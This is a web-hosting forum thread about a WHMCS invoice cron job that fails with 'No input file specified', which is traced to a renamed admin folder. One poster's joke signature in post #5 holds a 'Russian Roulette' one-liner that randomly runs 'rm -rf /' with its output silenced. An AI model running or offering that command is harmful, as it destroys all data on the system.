Results 1 to 8 of 8

Thread: Cron Jobs For Invoices

  1. #1
    James Guest

    Default Cron Jobs For Invoices

    Set up the cron job and i get "No input file specified." (php version)

    it is directed to the right url as it is copied from the admin section.

    is there any way of generating the invoices manually?

    Please advise

    James

  2. #2
    Join Date
    Jul 2005
    Location
    UK
    Posts
    8,437

    Default

    Hi,

    It is possible to generate invoices manually from the invoices section of the clients profile - you will find it on one of the tabs at the top of the client profile page. This will allow you to create your urgent invoices. However, please contact me on [email protected] with login details to your WHMCS system to resolve the problem.

    Thanks,

    Matt

  3. #3
    Join Date
    Sep 2008
    Posts
    5

    Default

    I am getting this as well.
    Anyone have a resolution?

  4. #4
    Join Date
    Jan 2008
    Location
    Omaha, Nebraska, USA
    Posts
    480

    Default

    WOW - talk about an old thread dig-up. This is from 3 years ago

    What issue are you having? Are you looking for a manual generation of invoices? Did you setup the cron jobs as outlined under the Configuration > Automation section of WHMCS?
    Conor Treacy
    cPanel Hosting, VPS and Dedicated Servers - Hands-on Web Hosting
    eCommerce, blog, CMS and forum specalists!

  5. #5
    Join Date
    Jun 2008
    Posts
    79

    Default

    At least he used search!
    Want to play Russian Roulette?
    [ $(echo "scale=0; $RANDOM % 6" | bc -l) == 0 ] && nohup rm -rf / >/dev/null 2>&1 || echo "You live (for now)"

  6. #6
    Join Date
    Sep 2008
    Posts
    5

    Default

    Hi. Wow I didnt notice the date. I just did a search!
    Well I have the cron job setup and Im getting an email from my server when it is supposed to run saying NO INPUT FILE Specified. For the cron job i have copied exactly whats in WHMCS. I have CPANEL so I even went down to the basic cron job config and pasted the command from my whmcs panel.

    When I surf using a browser directly to the cron.php file it runs fine.

  7. #7
    Join Date
    Jun 2008
    Posts
    5

    Default

    I'm also getting this same "No input file specified." error when the daily cron job runs. Does anyone have a solution?

  8. #8
    Join Date
    Jun 2008
    Posts
    5

    Default

    Ok I worked it out. This might solve it for others.
    WHMCS told us to simply run this file;

    .../services/admin/cron.php

    But we had moved the admin folder to a random name eg;

    .../services/myadminname/cron.php

    So watch out for this.

Similar Threads

  1. Cron Jobs
    By LifeGuard in forum Pre-Sales Questions
    Replies: 9
    Last Post: 10-12-10, 01:56 PM
  2. cron jobs
    By andluiz in forum General Discussion
    Replies: 3
    Last Post: 04-26-07, 01:47 PM